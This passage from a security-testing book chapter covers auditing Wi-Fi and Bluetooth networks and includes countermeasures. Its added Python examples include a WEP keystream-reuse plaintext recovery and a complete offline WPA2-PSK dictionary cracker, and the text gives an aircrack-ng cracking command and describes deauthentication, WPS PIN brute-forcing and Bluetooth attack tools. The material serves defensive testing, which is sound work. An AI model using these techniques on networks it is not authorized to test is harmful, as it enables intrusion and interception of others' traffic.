As an alternative to the antennas described in the preceding list, you can use a nifty can design, called a cantenna, made from a Pringles, coffee, or pork-and-beans can. If you're interested in trying this, check out the article at www.turnpoint.net/wireless/has.html for details. A simple Internet search turns up a lot of information on this subject. One site in particular (www.cantenna.com) sells the Super Cantenna kit, which has worked well for me.
Discovering Wireless Networks

After you have a wireless card and wireless testing software, you're ready to roll. The first tests you should perform gather information about your wireless network, as described in the following sections.

Checking for worldwide recognition

The first test requires only the MAC address of your AP and access to the Internet. (You can find out more about MAC addresses later in this chapter, in the "MAC spoofing" section.) You're testing to see whether someone has discovered your Wi-Fi signal and posted information about it for the world to see. Here's how the test works:

1. Find your AP's MAC address.

If you're not sure what your AP's MAC address is, you should be able to view it by using the arp -a command at a Windows command prompt. You might have to ping the access point's IP address first so the MAC address is loaded into your ARP cache. Keep in mind that this gives you the MAC of the AP's wired or management interface; what wardriving databases record is the BSSID, the radio's MAC, which on many APs is a different address. If the wired MAC turns up nothing, read the BSSID from your wireless client's connection details or a scanner instead. Figure 10-1 shows what this can look like.

2. After you have the AP's MAC address, browse to the WiGLE database of wireless networks (https://wigle.net).

3. Register with the site so you can perform database queries. It's worth it.

4. Select the Login link in the upper right corner of the website, and then select View and then Search.

You see a screen similar to Figure 10-2.

5. To see whether your network is listed, you can enter such AP information as geographical coordinates and SSID (service set identifier), but the simplest thing to do is enter your MAC address in the format shown in the example for the BSSID/MAC text box.

If your AP is listed, someone has discovered it, most likely via wardriving, and has posted the information for others to see. You need to start implementing the security countermeasures listed in this chapter as soon as possible to keep others from using this information against you!

Figure 10-1: Finding the MAC address of an AP by using arp.

Figure 10-2: Searching for your wireless APs using the WiGLE database.
Scanning your local airwaves

Monitor the airwaves around your building to see what authorized and unauthorized APs you can find. You're looking for the SSID, which is your wireless network name. If you have multiple and separate wireless networks, each one may or may not have a unique SSID associated with it.

You can get started with a tool such as NetStumbler (www.netstumbler.com/downloads). NetStumbler can discover SSIDs and other detailed information about wireless APs, including the following:

- MAC address
- Name
- Radio channel in use
- Vendor name
- Whether encryption is on or off
- RF signal strength (signal-to-noise ratio)

NetStumbler is quite old and is no longer maintained, but it still works nonetheless. Another tool option is inSSIDer (www.inssider.com).

Figure 10-3 shows an example of what you might see when running NetStumbler in your environment. The information that you see here is what others can see as long as they're in range of your AP's radio signals. NetStumbler and most other tools work by sending a probe request from the client. Any APs within signal range respond to the request with their SSIDs, that is, if they're configured to answer broadcast probe requests with their SSIDs.

Figure 10-3: NetStumbler displays detailed data on APs.

When you're using wireless network analyzers, including OmniPeek and CommView for WiFi, your adapter might enter passive monitoring mode. This means you can no longer communicate with other wireless hosts or APs while the program is loaded.
Discovering Wireless Network Attacks and Taking Countermeasures

Various malicious hacks, including DoS attacks, can be carried out against your WLAN. This includes knocking clients off the network with deauthentication frames so that their reassociation reveals an otherwise hidden SSID. In addition, hackers can literally jam the RF signal of an AP, especially in 802.11b and 802.11g systems, and force the wireless clients to re-associate to a rogue AP masquerading as the victim AP.

Hackers can create man-in-the-middle attacks by maliciously using a tool such as the WiFi Pineapple (www.wifipineapple.com/index.php) and can flood your network with thousands of packets per second by using the raw packet-generation tools Nping (https://nmap.org/nping) or NetScanTools Pro (www.netscantools.com), enough to bring the network to its knees. Even more so than with wired networks, this type of DoS attack is very difficult to prevent on Wi-Fi.

You can carry out several attacks against your WLAN. The associated countermeasures help protect your network from these vulnerabilities as well as from the malicious attacks previously mentioned. When testing your WLAN security, look out for the following weaknesses:

- Unencrypted wireless traffic
- Weak WEP and WPA pre-shared keys
- Crackable Wi-Fi Protected Setup (WPS) PINs
- Unauthorized APs
- Easily circumvented MAC address controls
- Wireless equipment that's physically accessible
- Default configuration settings

A good starting point for testing is to attempt to attach to your WLAN as an outsider and run a general vulnerability assessment tool, such as LanGuard or Nexpose. This test enables you to see what others can see on your network, including information on the OS version, open ports on your AP, and even network shares on wireless clients. Figure 10-4 shows the type of information that can be revealed about an AP on your network, including a missing administrator password, an outdated operating system, and open ports and shares that can be exploited.
Don't overlook Bluetooth

You undoubtedly have various Bluetooth-enabled wireless devices, such as laptops and smartphones, running within your organization. Although vulnerabilities are not as prevalent as they are in 802.11-based Wi-Fi networks, they still exist (currently, over 100 Bluetooth-related weaknesses are listed at http://nvd.nist.gov), and quite a few hacking tools take advantage of them. You can even overcome the personal area network distance limitation of Bluetooth's signal (typically just a few meters) and attack Bluetooth devices remotely by building and using a BlueSniper rifle. (See the following list for the website.) Various resources and tools for testing Bluetooth authentication/pairing and data transfer weaknesses include:

- Blooover (http://trifinite.org/trifinite_stuff_blooover.html)
- Bluelog, part of Kali Linux
- BlueScanner (http://sourceforge.net/projects/bluescanner)
- Bluesnarfer (www.alighieri.org/tools/bluesnarfer.tar.gz)
- BlueSniper rifle (www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html)
- Btscanner, part of Kali Linux
- CarWhisperer (http://trifinite.org/trifinite_stuff_carwhisperer.html)
- Detailed presentation on the various Bluetooth attacks (http://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pdf)

Although many (arguably most) Bluetooth-related flaws are not high risk, they still need to be addressed based on your own unique circumstances. Make sure that Bluetooth testing falls within the scope of your overall security assessments and oversight.
Encrypted traffic

Wireless traffic can be captured directly out of the airwaves, making this communications medium susceptible to eavesdropping. Unless the traffic is encrypted, it's sent and received in cleartext just as on a standard wired network. On top of that, the 802.11 encryption protocols, Wired Equivalent Privacy (WEP), yep, it's still around, and Wi-Fi Protected Access (WPA), have their own weaknesses that allow attackers to crack the encryption keys and decrypt the captured traffic. This vulnerability has really helped put Wi-Fi on the map, so to speak.

WEP, in a certain sense, lives up to its name: it was meant to provide privacy roughly equivalent to that of a wired network, no more. However, it wasn't intended to be cracked so easily. WEP uses the RC4 stream cipher, a symmetric (shared-key) algorithm that was considered reasonably strong at the time but has since been deprecated everywhere. Hackers can observe encrypted wireless traffic and recover the WEP key because of a flaw in how the RC4 initialization vector (IV) is used in the protocol. The IV is only 24 bits long, so there are just 2^24 (about 16.7 million) possible values, and a busy network is bound to repeat one. In practice repeats come much sooner: by the birthday bound the first collision among randomly chosen IVs is expected after only a few thousand frames, and sooner still as wireless clients reset their counters when they enter and leave the network. Because WEP seeds RC4 with the IV prepended to the shared key, two frames with the same IV are encrypted with the same keystream, and XORing the two ciphertexts cancels the keystream entirely. Worse, certain "weak" IVs leak information about the key bytes themselves, which is what the key-recovery attacks exploit.

Most WEP implementations initialize wireless hardware with an IV of 0 and increment it by 1 for each packet sent. This can lead to the IVs reinitializing (starting over at 0) approximately every five hours on a busy link. Given this behavior, Wi-Fi networks that have a lower amount of usage can be harder to crack than large Wi-Fi environments that transmit a lot of wireless data, simply because there's not enough wireless traffic being generated. Don't count on that, though: an attacker who can inject traffic doesn't have to wait for yours.
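The following is an added example, not code from the book: it shows the IV-reuse consequence described above in working code, and puts numbers on the two rates the text mentions. The RC4 is a textbook implementation written for this demonstration, and the 40-bit key, the reused IV and the two frame contents are constructed sample data, not captured traffic.

```python
import math

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS  # 16,777,216 possible IVs


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 (key-scheduling + generation), written for this example."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(shared_key: bytes, iv: int, plaintext: bytes) -> bytes:
    """WEP seeds RC4 with IV || key; the 3-byte IV travels in the clear in the frame."""
    seed = iv.to_bytes(3, "big") + shared_key
    keystream = rc4_keystream(seed, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, keystream))


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def recover_other_plaintext(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so c1 ^ c2 == p1 ^ p2.
    One known plaintext (predictable headers are plenty) reveals the other; no key needed."""
    return xor(xor(c1, c2), known_p1)


def expected_frames_until_first_iv_collision() -> float:
    """Birthday bound for randomly chosen IVs: about sqrt(pi/2 * N)."""
    return math.sqrt(math.pi / 2 * IV_SPACE)


def hours_until_sequential_iv_wraps(frames_per_second: float) -> float:
    """Cards that count IVs up from 0 wrap after exactly IV_SPACE frames."""
    return IV_SPACE / frames_per_second / 3600


# Constructed sample data: a 40-bit WEP key, one reused IV, two frames of equal length.
SHARED_KEY = bytes.fromhex("0102030405")
REUSED_IV = 0x00ABCD
FRAME_1 = b"ARP request: who has 10.11.12.1?"   # the kind of frame an attacker can predict
FRAME_2 = b"secret POST body: user=bob&pw=hi"   # the frame the attacker wants

if __name__ == "__main__":
    c1 = wep_encrypt(SHARED_KEY, REUSED_IV, FRAME_1)
    c2 = wep_encrypt(SHARED_KEY, REUSED_IV, FRAME_2)
    print(recover_other_plaintext(c1, c2, FRAME_1))
    print(f"~{expected_frames_until_first_iv_collision():.0f} random IVs before the first repeat")
    print(f"{hours_until_sequential_iv_wraps(1000):.1f} h until a sequential IV counter wraps at 1000 frames/s")
```

At 1,000 frames per second a sequential counter wraps in about 4.7 hours, which is where the "approximately every five hours" figure comes from; with random IVs the first repeat is expected after roughly 5,100 frames, which is why collisions are a minutes-not-hours problem in practice.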
Using WEPCrack (http://sourceforge.net/projects/wepcrack) or Aircrack-ng (http://aircrack-ng.org), attackers need to collect only a few minutes' up to a few days' worth of packets (depending on how much wireless traffic is on the network) to break the WEP key. Figure 10-5 shows airodump-ng (which is part of the Aircrack-ng suite) capturing WEP initialization vectors, and Figure 10-6 shows aircrack-ng at work cracking the WEP key of my test network.

Figure 10-5: Using airodump to capture WEP initialization vectors.

Figure 10-6: Using aircrack to crack WEP.

Airodump and aircrack are very simple to run in Windows. You just download and extract the aircrack programs, the cygwin Linux simulation environment, and the supporting peek files from http://aircrack-ng.org, and you're ready to capture packets and crack away!

A longer key length, such as 128 bits or 256 bits, doesn't make WEP exponentially more difficult to crack. This is because the statistical attacks on WEP's RC4 key schedule recover the key one byte at a time, so each additional key byte costs only a linear amount of extra captured traffic (on the order of tens of thousands of packets per byte) rather than doubling the work.
The wireless industry came up with a solution to the WEP problem called Wi-Fi Protected Access (WPA). WPA uses the Temporal Key Integrity Protocol (TKIP) encryption system, which was designed to run on existing WEP hardware and closes the known WEP holes (per-packet key mixing, a longer IV, and a message integrity check), although TKIP has since been shown to have weaknesses of its own and is deprecated. WPA2, which quickly replaced the original WPA, uses an even stronger encryption method called Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (say that fast three times), or CCMP for short, based on the Advanced Encryption Standard (AES). WPA and WPA2 running in "enterprise mode" require an 802.1X authentication server, such as a RADIUS server, to manage user accounts for the WLAN.

For non-enterprise wireless APs (and there are plenty out there in business), there's no good reason not to be running WPA2 using pre-shared keys (PSKs).

You can also use aircrack-ng to crack WPA and WPA2-PSK. To crack WPA-PSK encryption, you have to capture a wireless client authenticating with its access point, that is, the four-way handshake. The handshake carries everything needed to test candidate passphrases offline: both nonces, both MAC addresses, and a message integrity code keyed with material derived from the passphrase and the SSID. A quick (and dirty) way to force the re-authentication process is to send a de-authenticate packet to the broadcast address. This is something my co-author, Peter T. Davis, and I cover in detail in our book, Hacking Wireless Networks For Dummies.

You can use airodump-ng to capture packets and then start aircrack-ng (you can also run them simultaneously) to initiate cracking the pre-shared key by using the following command-line options:

# aircrack-ng -a 2 -w path_to_wordlist <capture file(s)>

Here -a 2 selects WPA-PSK cracking mode and -w names the dictionary file.

WPA key recovery is dependent on a good dictionary. The dictionary files available at www.outpost9.com/files/WordLists.html are a good starting point. Even with a great dictionary chock-full of potential passwords, I've often found that dictionary attacks against WPA are futile. Know your limits so you don't waste too much time trying to crack WPA PSKs that are not crackable.
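The following is an added example, not code from the book or from the Aircrack-ng project: it implements what aircrack-ng -a 2 does with a capture, using the key-derivation formulas from 802.11i (PBKDF2 for the PMK, PRF-512 for the PTK, HMAC-SHA1 for the WPA2 message MIC). Because there is no real capture to read, the make_sample_handshake helper stands in for a pcap and builds message 2 of a handshake from constructed values: the SSID, MAC addresses, nonces, EAPOL bytes and passphrase are all made up for the example.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are the whole reason WPA-PSK cracking is slow per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    AA/SPA are the AP and client MACs; both nonces are sent in the clear."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output covers the 64 bytes needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP: MIC = HMAC-SHA1(KCK, EAPOL-Key frame with its MIC field zeroed)[:16].
    KCK (key confirmation key) is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol_zeroed, captured_mic):
    """Offline dictionary attack: the captured MIC is a test oracle for each candidate."""
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


def make_sample_handshake(passphrase: str = "letmein2016") -> dict:
    """Constructed stand-in for a captured message 2 of the four-way handshake.
    Every value here is made up for the example; a real run reads them from the pcap."""
    ssid = "doh!"
    aa = bytes.fromhex("004096ffffff")   # AP (authenticator) MAC
    spa = bytes.fromhex("00095bffffff")  # client (supplicant) MAC
    anonce = hashlib.sha256(b"sample anonce").digest()
    snonce = hashlib.sha256(b"sample snonce").digest()
    # EAPOL-Key message 2 with its 16-byte MIC field zeroed (layout abbreviated).
    eapol_zeroed = (b"\x01\x03\x00\x75\x02\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"
                    + snonce + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00")
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return dict(ssid=ssid, aa=aa, spa=spa, anonce=anonce, snonce=snonce,
                eapol_zeroed=eapol_zeroed, captured_mic=eapol_mic(kck, eapol_zeroed))


if __name__ == "__main__":
    hs = make_sample_handshake()
    print(crack_psk(["password", "qwerty123", "letmein2016", "corp2016"], **hs))
```

Every candidate costs one PBKDF2 run of 4,096 HMAC-SHA1 iterations, which is why throughput is measured in thousands of keys per second even on a GPU, and why a 20-character random PSK is out of reach: the attack is only ever as good as the wordlist.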
Another commercial alternative for cracking WPA and WPA2 keys is ElcomSoft Wireless Security Auditor (EWSA). To use EWSA, you simply capture wireless packets in the tcpdump (pcap) format (every WLAN analyzer supports this format), load the capture file into the program, and shortly thereafter you have the PSK. EWSA is a little different because it can crack WPA and WPA2 PSKs in a fraction of the time it would normally take, but there's a caveat. You must have a computer with a supported NVIDIA or AMD video card. Yep, EWSA doesn't just use the processing power of your CPU; it also harnesses the power and mammoth acceleration capabilities of the video card's graphics processing unit (GPU). Now that's innovation!

The main EWSA interface is shown in Figure 10-7.

Figure 10-7: Using ElcomSoft Wireless Security Auditor to crack WPA pre-shared keys.

Using EWSA, you can try to crack your WPA/WPA2 PSKs at a rate of up to 173,000 WPA/WPA2 pre-shared keys per second. Compare that to the lowly few hundred keys per second using just the CPU and you can see the value in a tool like this. I always say you get what you pay for! (The bottleneck either way is the 4,096-iteration PBKDF2 computation per candidate, which is what makes WPA-PSK cracking so much slower than WEP cracking.)

If you need to use your WLAN analyzer to view traffic as part of your security assessment, you won't see any traffic if WEP or WPA/WPA2 is enabled unless you know the keys associated with each network. You can enter each key into your analyzer, but just remember that hackers can do the same thing if they're able to crack your WEP or WPA pre-shared keys by using one of the tools I mention earlier. (For WPA/WPA2 the analyzer also needs to have captured each client's four-way handshake; the PSK alone doesn't decrypt a session whose handshake it missed, because each session's keys are derived from the handshake nonces.)

Figure 10-8 shows an example of how you can view protocols on your WLAN by entering the WPA key into OmniPeek via the Capture Options window before you start your packet capture.

Figure 10-8: Using OmniPeek to view encrypted wireless traffic.
Countermeasures against encrypted traffic attacks

The simplest solution to the WEP problem is to migrate to WPA2 for all wireless communications. You can also layer a VPN over the wireless link. Windows ships with Point-to-Point Tunneling Protocol (PPTP) support for free, but PPTP's MS-CHAPv2 authentication is broken (the credentials can be recovered from a captured exchange), so don't rely on it for anything sensitive. The IPsec support built into Windows, as well as Secure Shell (SSH), Secure Sockets Layer/Transport Layer Security (SSL/TLS), and other vendor solutions, will keep your traffic secure. Just keep in mind that there are cracking programs for PPTP, for IPsec when IKE aggressive mode is used with pre-shared keys, and for other VPN protocols as well, but overall a properly configured VPN leaves you far better off than no VPN at all.

Older 802.11-based mitigations exist as well. If you can configure your wireless hosts to regenerate a new key dynamically after a certain number of packets have been sent, the WEP vulnerability becomes much harder to exploit. Many AP vendors implemented this fix as a separate configuration option, so check for the latest firmware with features to manage key rotation. For instance, the proprietary Cisco LEAP protocol uses per-user WEP keys that offer a layer of protection if you're running Cisco hardware. Again, be careful because cracking programs exist for LEAP, such as asleap (http://sourceforge.net/projects/asleap), which attacks LEAP's MS-CHAP-style challenge/response offline. The best thing to do is just stay away from WEP.

The 802.11i standard from the IEEE integrates the WPA fixes and more. This standard is an improvement over WPA but is not compatible with older 802.11b hardware because of its implementation of the Advanced Encryption Standard (AES) for encryption in WPA2.

If you're using WPA2 with a pre-shared key (which is more than enough for small Wi-Fi), ensure that the key contains at least 20 random characters so it isn't susceptible to the offline dictionary attacks available in such tools as Aircrack-ng and ElcomSoft Wireless Security Auditor. The attack settings for ElcomSoft Wireless Security Auditor are shown in Figure 10-9.

Figure 10-9: ElcomSoft Wireless Security Auditor's numerous password cracking options.

As you can see, everything from plain dictionary attacks to combination attacks to hybrid attacks that use specific word rules is available. Use a long, random pre-shared key so you don't fall victim to someone with a lot of time on their hands!

Keep in mind that although WEP and weak WPA pre-shared keys are crackable, either is still marginally better than no encryption at all. Similar to the effect that home security system signs have on would-be home intruders, a wireless LAN running WEP or weak WPA pre-shared keys is not quite as attractive to a criminal hacker as one without it. Many intruders are likely to move on to easier targets unless they really want to get into yours. Don't mistake that for protection, though: WEP falls in minutes to anyone who has decided to bother.
Wi-Fi Protected Setup

Wi-Fi Protected Setup (WPS) is a wireless standard that enables simple connectivity to "secure" wireless APs. The problem with WPS is that its implementation of registrar PINs makes it easy to connect to wireless and can facilitate attacks on the very WPA/WPA2 pre-shared keys used to lock down the overall system. The 8-digit PIN is validated in two halves, and its last digit is a checksum, so an attacker has to try at most about 11,000 combinations rather than 100 million. As we've seen over the years with security, everything's a tradeoff!

WPS is intended for consumer use in home wireless networks. If your wireless environment is like most others that I see, it probably contains consumer-grade wireless APs (routers) that are vulnerable to this attack.

The WPS attack is relatively straightforward using an open source tool called Reaver (https://code.google.com/p/reaver-wps). Reaver works by executing a brute-force attack against the WPS PIN. I use the commercial version, Reaver Pro (www.reaversystems.com), which is a device that you connect your testing system to over Ethernet or USB. Reaver Pro's interface, as shown in Figure 10-10, is pretty straightforward.

Figure 10-10: The Reaver Pro startup window.

Running Reaver Pro is easy. You simply follow these steps:

1. Connect to the Reaver Pro device by plugging your testing system into the PoE LAN network connection. You should get an IP address from the Reaver Pro device via DHCP.

2. Load a web browser, browse to http://10.9.8.1, and log in with reaver/foo as the username and password.

3. On the home screen, press the Menu button and a list of wireless networks should appear.

4. Select your wireless network from the list and then click Analyze.

5. Let Reaver Pro run and do its thing.

This process is shown in Figure 10-11.

Figure 10-11: Using Reaver Pro to determine that Wi-Fi Protected Setup is enabled.

If you wish to have Reaver Pro automatically start cracking your WPS PIN, you'll need to click Configure and set the WPS Pin setting to On. WPS PIN cracking can take anywhere from a few minutes to a few hours, but if successful, Reaver Pro will return the WPA pre-shared key or will tell you that the wireless network is too far away or that intruder lockout is enabled.

I've had mixed results with Reaver Pro depending on the computer I'm running it on and the wireless AP that I'm testing. It's still a worthy attack you should pursue if you're looking to find and fix the wireless flaws that matter.

Countermeasures against the WPS PIN flaw

It's rare to come across a security fix as straightforward as this one: Disable WPS. Then re-test with Reaver, because on some consumer routers the "off" setting in the web interface doesn't actually stop the PIN method from answering. If you need to leave WPS enabled, at least set up MAC address controls on your AP(s). It's not foolproof, but it's better than nothing! More recent consumer-grade wireless routers also have intruder lockout for the WPS PIN. If the system detects WPS PIN cracking attempts, it will lock out those attempts for a certain period of time. The best thing to do to prevent WPS attacks in the enterprise is to not use low-end wireless routers in the first place.
Rogue wireless devices

Watch out for unauthorized APs and wireless clients that are attached to your network and running in ad-hoc mode.

Also, be sure to educate your users on safe Wi-Fi usage when they're outside of your office. Communicate to them the dangers of connecting to unknown Wi-Fi and remind them on a periodic and consistent basis. Otherwise, their systems can be hacked or become infected with malware, and guess whose problem it is once they connect back onto your network.

By using NetStumbler or your client manager software, you can test for APs and ad-hoc (or peer-to-peer) devices that don't belong on your network. You can also use the network monitoring features in a wireless network analyzer, such as OmniPeek and CommView for WiFi.

Look for the following rogue AP characteristics:

- Odd SSIDs, including the popular default ones such as linksys and free public wifi.
- MAC addresses that don't belong on your network. Look at the first three bytes of the MAC address (the first six hex digits), the Organizationally Unique Identifier (OUI), which identify the vendor. You can perform a MAC address vendor lookup at http://standards.ieee.org/develop/regauth/oui/public.html to find information on APs you're unsure of.
- Weak radio signals, which can indicate that an AP has been hidden away or is adjacent to or even outside of your building.
- Communications across a different radio channel (or channels) than what your network communicates on.
- Degradation in network throughput for any Wi-Fi client.
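The following is an added example, not code from the book or from any of the scanners it names: it applies the checklist above (plus the ad-hoc and wired-side checks discussed later in this section) to a scan list of the kind NetStumbler, CommView or Kismet export. The records, the "authorized" BSSID and OUI lists, the channel plan and the wired ARP table are all constructed sample data; in particular, 24:A4:3C is assumed here to be the organization's own AP vendor prefix. The wired check is a plain exact match on the MAC, which is a simplification: many APs use a wired MAC that differs slightly from the radio's BSSID.

```python
from dataclasses import dataclass

# 802.11 capability-information bits carried in every beacon and probe response.
CAP_ESS = 0x0001      # set by an infrastructure AP
CAP_IBSS = 0x0002     # set by an ad-hoc (peer-to-peer) station
CAP_PRIVACY = 0x0010  # set when WEP/WPA/WPA2 is in use

DEFAULT_SSIDS = {"linksys", "default", "netgear", "dlink", "free public wifi", ""}


@dataclass
class ScanRecord:
    bssid: str
    ssid: str
    channel: int
    rssi_dbm: int
    capability: int


def oui(mac: str) -> str:
    """First three bytes (six hex digits) of a MAC: the IEEE-assigned vendor prefix."""
    return mac.upper()[:8]


def triage(records, authorized_bssids, authorized_ouis, our_channels,
           wired_arp_macs=frozenset(), weak_rssi_dbm=-80):
    """Map BSSID -> list of reasons it looks rogue; known-good BSSIDs are skipped."""
    authorized_bssids = {m.upper() for m in authorized_bssids}
    wired_arp_macs = {m.upper() for m in wired_arp_macs}
    findings = {}
    for r in records:
        bssid = r.bssid.upper()
        if bssid in authorized_bssids:
            continue
        reasons = []
        if (r.capability & CAP_IBSS) or not (r.capability & CAP_ESS):
            reasons.append("ad-hoc/IBSS (ESS bit not set)")
        if r.ssid.lower() in DEFAULT_SSIDS:
            reasons.append(f"default or empty SSID {r.ssid!r}")
        if oui(bssid) not in authorized_ouis:
            reasons.append(f"vendor OUI {oui(bssid)} not in our hardware list")
        if r.channel not in our_channels:
            reasons.append(f"off-channel (channel {r.channel})")
        if r.rssi_dbm < weak_rssi_dbm:
            reasons.append(f"weak signal ({r.rssi_dbm} dBm): hidden, or outside the building")
        if not (r.capability & CAP_PRIVACY):
            reasons.append("Privacy bit clear: open network")
        if bssid in wired_arp_macs:
            reasons.append("same MAC seen in the wired ARP table: plugged into our LAN")
        if reasons:
            findings[bssid] = reasons
    return findings


# Constructed scan export and site inventory (assumed values, not real hardware).
AUTHORIZED_OUIS = {"24:A4:3C"}
AUTHORIZED_BSSIDS = {"24:A4:3C:11:22:33"}
OUR_CHANNELS = {6}
SCAN = [
    ScanRecord("24:A4:3C:11:22:33", "corp", 6, -50, CAP_ESS | CAP_PRIVACY),
    ScanRecord("00:40:96:FF:FF:FF", "doh!", 11, -60, CAP_ESS),
    ScanRecord("00:09:5B:FF:FF:FF", "linksys", 1, -85, CAP_ESS | CAP_PRIVACY),
    ScanRecord("02:1A:2B:3C:4D:5E", "", 6, -40, CAP_IBSS),
]

if __name__ == "__main__":
    result = triage(SCAN, AUTHORIZED_BSSIDS, AUTHORIZED_OUIS, OUR_CHANNELS,
                    wired_arp_macs={"00:40:96:ff:ff:ff"})
    for bssid, reasons in result.items():
        print(bssid, "->", "; ".join(reasons))
```

The ad-hoc test reads the capability field directly, which is the same check a WIPS performs when it looks for beacons whose ESS bit isn't set. Treat the output as a worklist for a physical walk-through, not a verdict: a weak signal on a neighbor's channel is usually the office next door.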
In Figure 10-12, NetStumbler has found two potentially unauthorized APs. The ones that stand out are the two with SSIDs of BI and LarsWorld. Notice how they're running on two different channels, at two different speeds, and are made by two different hardware vendors. If you know what's supposed to be running on your wireless network (you do, don't you?), unauthorized systems should really stand out.

Figure 10-12: NetStumbler showing potentially unauthorized APs.

NetStumbler does have one limitation: It won't find APs that have probe response (SSID broadcast) packets disabled. Commercial wireless network analyzers such as CommView for WiFi, as well as the open source Kismet, look not only for probe responses from APs like NetStumbler does, but also for other 802.11 management packets, such as association responses and beacons. This allows Kismet to detect the presence of hidden Wi-Fi. (A "hidden" AP still sends beacons; it just leaves the SSID field empty, and its BSSID, channel, and capabilities are all there to see.)

If the Linux platform is not your cup of tea, and you're still looking for a quick and dirty way to root out hidden APs, you can create a client-to-AP reconnection scenario that forces the broadcasting of SSIDs using de-authentication packets. You can find detailed instructions in the book I wrote with Peter T. Davis, Hacking Wireless Networks For Dummies.

The safest way to root out hidden APs is to simply search for 802.11 management packets. You can configure your wireless network analyzer, such as OmniPeek, to search for 802.11 management packets by enabling a capture filter on 802.11 management packets, as shown in OmniPeek's options in Figure 10-13.

Figure 10-13: You can configure OmniPeek to detect APs that don't broadcast their SSIDs.

Figure 10-14 shows how you can use CommView for WiFi to spot an odd network host. For instance, in the example shown in Figure 10-14,Technico and Netgear systems are showing up, but only Ubiquiti hardware is used on this particular network.

Figure 10-14: Using CommView for WiFi to spot wireless systems that don't belong.

My test network for this example is small compared to what you might see, but you get the idea of how an odd system can stand out.

Wi-Fi set up in ad-hoc (or peer-to-peer) mode enables wireless clients to communicate directly with one another without having to pass through an AP. These types of Wi-Fi operate outside the normal wireless security controls and can cause serious security issues beyond the normal 802.11 vulnerabilities.

You can use just about any wireless network analyzer to find unauthorized ad-hoc devices on your network. If you come across quite a few ad-hoc systems, such as those devices listed as STA (short for station) in CommView for WiFi's Type column, as shown in Figure 10-15, this could be a good indication that one (or several) person is running unprotected wireless systems or at least has ad-hoc wireless enabled. These systems are often printers and other seemingly benign network systems, but they can be workstations and mobile devices. Either way, they're potentially putting your network and information at risk, so they're worth checking out.

Figure 10-15: CommView for WiFi showing several unauthorized ad-hoc clients.

You can also use the handheld Digital Hotspotter I mention earlier in this chapter (see "Choosing Your Tools") to search for ad-hoc-enabled systems, or even a wireless intrusion prevention system (WIPS) to search for beacon packets in which the ESS bit of the capability field is not set to 1 (an ad-hoc network sets the IBSS bit instead).

Walk around your building or campus (warwalk, if you will) to perform this test to see what you can find. Physically look for devices that don't belong, and keep in mind that a well-placed AP or Wi-Fi client that's turned off won't show up in your network analysis tools. Search near the outskirts of the building or near any publicly accessible areas. Scope out boardrooms and the offices of upper-level managers for any unauthorized devices. These places may be off-limits, but that's all the more reason to check them for rogue APs.

When searching for unauthorized wireless devices on your network, keep in mind that you might be picking up signals from nearby offices or homes. Therefore, if you find something, don't immediately assume it's a rogue device. One way to figure out whether a device is in a nearby office or home is by the strength of the signal you detect. Devices outside your office should have a weaker signal than those inside. Using a wireless network analyzer in this way helps narrow the location and prevent false alarms in case you detect legitimate neighboring wireless devices.

It pays to know your network environment. Knowing what your surroundings should look like makes it easier to spot potential problems.

A good way to determine whether an AP you discover is attached to your wired network is to check whether its MAC address shows up on the wired side. Populate the ARP cache from a wired host (ping the subnet, for instance), then run arp -a at a command prompt and compare the MAC addresses listed with the BSSID of the suspect AP. Keep in mind that an AP's wired interface often carries a MAC address that differs slightly from its radio's BSSID, so look for near matches in the same OUI as well as exact ones. (This is a plain ARP cache lookup; reverse ARP, or RARP, is a different and obsolete protocol.)

Also, keep in mind that Wi-Fi authenticates the wireless devices, not the users. Criminal hackers can use this to their advantage by gaining access to a wireless client via remote-access software, such as telnet or SSH, or by exploiting a known application or OS vulnerability. After they do that, they potentially have full access to your network and you would be none the wiser.

Countermeasures against rogue wireless devices

The only way to detect rogue APs and wireless hosts on your network is to monitor your wireless network proactively (in real time if possible), looking for indicators that wireless clients or rogue APs might exist. A WIPS is perfect for such monitoring. But if rogue APs or clients don't show up, that doesn't mean you're off the hook. You might also need to break out the wireless network analyzer or other network management application.

